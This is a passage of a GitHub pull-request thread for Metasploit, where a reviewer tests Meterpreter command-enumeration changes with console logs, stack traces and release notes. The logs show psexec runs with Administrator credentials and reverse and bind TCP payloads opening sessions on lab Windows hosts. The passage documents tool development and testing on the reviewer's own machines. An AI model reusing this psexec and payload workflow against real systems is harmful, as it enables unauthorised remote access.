"/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:223:in `cmd_exploit'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:23:in `<main>'"]
msf6 exploit(multi/handler) > sessions -i 8
[*] Starting interaction with 8...


getuid
^C[-] sessions: Interrupted
msf6 exploit(multi/handler) > 

@gwillcox-r7
Contributor


Know you mentioned you couldn't replicate this Spencer, so here are my tests again from tonight showing I was still able to replicate this issue:

~/git/metasploit-framework │ land-pr14617:pr/14617 ⇣8⇡92 *1 ?15  git rebase upstream/master                       ✔ │ 2.7.2 Ruby 
First, rewinding head to replay your work on top of it...
Applying: Enumerate Meterpreter's supported core commands
Applying: Add a meterpreter test for enumerating core commands
Applying: Filter Meterpreter commands based on support instead of fingerprinting
Applying: Add and use a callback to report meterpreter commands that are disabled
Applying: Raise a more specific error when loading an unsupported extension
Applying: Consistently return nil when an id or name fails to resolve
Applying: Disabling filtering via command IDs on Windows for now
Applying: Use a more descriptive status indicator for command routines
 ~/git/metasploit-framework │ land-pr14617:pr/14617 ⇣8⇡94 *1 ?15  ./msfconsole                               ✔ │ 26s │ 2.7.2 Ruby 
[-] No local database connected, meaning some Metasploit features will not be available. A full list of the affected features & database setup instructions can be found here: https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit
[!] The following modules could not be loaded!..\
[!] 	/home/gwillcox/git/metasploit-framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/gwillcox/.msf4/logs/framework.log for details.
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.0.31-dev-76a0bdbea0               ]
+ -- --=[ 2099 exploits - 1128 auxiliary - 358 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with 
irb

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/bind_tcp 
payload => java/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 172.21.254.83
RHOST => 172.21.254.83
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.21.254.83:4444
[*] Sending stage (58147 bytes) to 172.21.254.83
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.21.254.83:4444) at 2021-02-11 20:39:25 -0600

meterpreter > load [-] Session manipulation failed: No such file or directory @ dir_initialize - /home/gwillcox/.msf4/payloads/meterpreter ["/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `open'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `entries'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `meterpreter_enum_ext'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:88:in `block in list_meterpreter_extensions'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `each'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `list_meterpreter_extensions'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `block in cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `map'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:455:in `tab_complete_helper'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:414:in `block in tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:388:in `tab_complete'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:69:in `block 
in init_tab_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/readline.rb:136:in `readline_attempted_completion_function'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6329:in `gen_completion_matches'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6813:in `rl_complete_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6903:in `rl_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4374:in `_rl_dispatch_subseq'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4363:in `_rl_dispatch'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4779:in `readline_internal_charloop'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4853:in `readline_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4875:in `readline'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:162:in `readline_with_output'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:100:in `pgets'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:321:in `get_input_line'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:141:in `run'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1545:in `cmd_sessions'", 
"/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:223:in `cmd_exploit'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:23:in `<main>'"]
msf6 exploit(multi/handler) > 

@gwillcox-r7
Contributor

gwillcox-r7 commented Feb 12, 2021

Edit: Moving the previous contents of this comment as this issue seems to be specific to Java Meterpreter and is not related to this PR's changes.

@gwillcox-r7
Contributor

Rebased to include the recent Gem bump update, should now be ready for testing.

@gwillcox-r7
Contributor

Python and Java seem to be working fine:

Windows 10 x64 with Python and Java Payloads
msf6 exploit(multi/handler) > set RHOST 172.22.109.251
RHOST => 172.22.109.251
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (python/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.22.109.251   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.109.251:4444
[*] Sending stage (39344 bytes) to 172.22.109.251
[*] Meterpreter session 5 opened (0.0.0.0:0 -> 172.22.109.251:4444) at 2021-02-19 17:30:41 -0600
[*] Session ID 5 (0.0.0.0:0 -> 172.22.109.251:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 5
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: Unknown error
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.109.251 - Meterpreter session 5 closed.  Reason: User exit
msf6 exploit(multi/handler) > set payload java/meterpreter/bind_tcp 
payload => java/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.22.109.251   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.109.251:4444
[*] Sending stage (58108 bytes) to 172.22.109.251
[*] Meterpreter session 6 opened (0.0.0.0:0 -> 172.22.109.251:4444) at 2021-02-19 17:31:45 -0600
[*] Session ID 6 (0.0.0.0:0 -> 172.22.109.251:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 6
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[*] Session doesn't implement getpid, skipping test
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 19; Failed: 0

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/windows)
meterpreter > 

Also the Windows x64 payload is working well:

Windows 10 x64 with x64 payload
msf6 exploit(windows/smb/psexec) > exploit

[*] 172.22.109.251:445 - Connecting to the server...
[*] 172.22.109.251:445 - Authenticating to 172.22.109.251:445 as user 'Administrator'...
[*] 172.22.109.251:445 - Selecting PowerShell target
[*] 172.22.109.251:445 - Executing the payload...
[+] 172.22.109.251:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.22.109.251:4444
[*] Sending stage (200262 bytes) to 172.22.109.251
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.22.109.251:4444) at 2021-02-19 17:28:27 -0600

meterpreter > 
[*] Session ID 4 (0.0.0.0:0 -> 172.22.109.251:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 4
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.109.251 - Meterpreter session 4 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOSTS                172.22.109.251    yes       The target host(s), range CIDR identifier, or
                                                     hosts file with syntax 'file:<path>'
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target fo
                                                     r pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                                   no        The share to connect to, can be an admin share
                                                      (ADMIN$,C$,...) or a normal read/write folder
                                                      share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               *censored*    no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.22.109.251   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) >

Also working with x86 on a Windows 10 x64 system:

Windows 10 x64 with x86 payload
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.22.109.251   yes       The target host(s), range CIDR identifier, or h
                                                    osts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for
                                                     pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share
                                                    (ADMIN$,C$,...) or a normal read/write folder s
                                                    hare
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.22.111.211   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass *censored*
SMBPass => *censored*
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.111.211:4444 
[*] 172.22.109.251:445 - Connecting to the server...
[*] 172.22.109.251:445 - Authenticating to 172.22.109.251:445 as user 'Administrator'...
[*] 172.22.109.251:445 - Selecting PowerShell target
[*] 172.22.109.251:445 - Executing the payload...
[+] 172.22.109.251:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 172.22.109.251
[*] Meterpreter session 1 opened (172.22.111.211:4444 -> 172.22.109.251:57865) at 2021-02-19 17:26:55 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.109.251 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > setg AutoRunScript post/test/meterpreter
AutoRunScript => post/test/meterpreter
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.111.211:4444 
[*] 172.22.109.251:445 - Connecting to the server...
[*] 172.22.109.251:445 - Authenticating to 172.22.109.251:445 as user 'Administrator'...
[*] 172.22.109.251:445 - Selecting PowerShell target
[*] 172.22.109.251:445 - Executing the payload...
[*] Sending stage (175174 bytes) to 172.22.109.251
[*] Meterpreter session 2 opened (172.22.111.211:4444 -> 172.22.109.251:57873) at 2021-02-19 17:27:22 -0600
[+] 172.22.109.251:445 - Service start timed out, OK if running a command or non-service executable...

meterpreter > run post/test/meterpreter

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0
meterpreter >

@gwillcox-r7

Output from PHP tests looks good as well:

php meterpreter is working well with new enum commands update

Looks like we are also not showing commands which aren't supported by a given implementation as can be seen below where the route command is not listed since it is not supported by PHP Meterpreter:

output of php meterpreter only showing supported commands

Overall this looks good to land, will merge this in now, nice work @zeroSteiner!

@gwillcox-r7 gwillcox-r7 merged commit e0dfd5c into rapid7:master Feb 20, 2021
@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Feb 20, 2021
gwillcox-r7 commented Feb 20, 2021

Release Notes

Updated the core Meterpreter and console libraries to better handle cases where a given implementation of Meterpreter may not support a certain command. Now, instead of each version of Meterpreter trying to handle invalid commands, which previously led to errors, a check is made to verify that the command is one the Meterpreter supports, with an error message provided if not. Additionally, the output from running the help or ? command inside the meterpreter prompt has been updated to only display the commands which a given Meterpreter implementation supports. Tests have also been updated accordingly to support checking that this functionality works as expected.
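The check described in the release notes above, modelled as an added example that is not code from this PR or from Metasploit: a session reports the command IDs it supports, the help listing is filtered by that list, and a known-but-unsupported command gets a different error from an unknown one. All class, method and constant names are hypothetical, and the command IDs and session labels are constructed.

```ruby
require 'set'

# Illustrative model only: names are hypothetical and the numeric command
# IDs are constructed, not Metasploit's real values.
class IncompatibleCommandError < StandardError; end
class UnknownCommandError < StandardError; end

# Every command the console knows about, mapped to a constructed command ID.
KNOWN_COMMANDS = {
  'sysinfo' => 1001,
  'ls'      => 1002,
  'route'   => 1003,
  'migrate' => 1004
}.freeze

class SessionModel
  attr_reader :session_type

  # supported_ids stands in for the list the remote side returns when it is
  # asked to enumerate the command IDs it can handle.
  def initialize(session_type, supported_ids)
    @session_type = session_type
    @supported_ids = Set.new(supported_ids)
  end

  def supports?(name)
    id = KNOWN_COMMANDS[name]
    !id.nil? && @supported_ids.include?(id)
  end

  # What a help listing shows: only commands this session reported.
  def help_commands
    KNOWN_COMMANDS.keys.select { |name| supports?(name) }.sort
  end

  # Separate "never heard of it" from "known, but not on this session".
  def dispatch(name)
    raise UnknownCommandError, "Unknown command: #{name}" unless KNOWN_COMMANDS.key?(name)
    unless supports?(name)
      raise IncompatibleCommandError,
            "The \"#{name}\" command is not supported by this session type (#{session_type})"
    end
    "dispatched #{name} (id #{KNOWN_COMMANDS[name]})"
  end
end

# Constructed sample sessions: the PHP one does not report route or migrate.
WINDOWS = SessionModel.new('windows', [1001, 1002, 1003, 1004])
PHP     = SessionModel.new('php', [1001, 1002])
```

Including the session type in the incompatibility message mirrors the PR's stated goal of making user-reported issues easier to troubleshoot.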

Labels
library meterpreter rn-enhancement release notes enhancement usability Usability improvements
Development

Successfully merging this pull request may close these issues.

PHP Migrate Command Will Always Return Undefined Method pid for nil:NilClass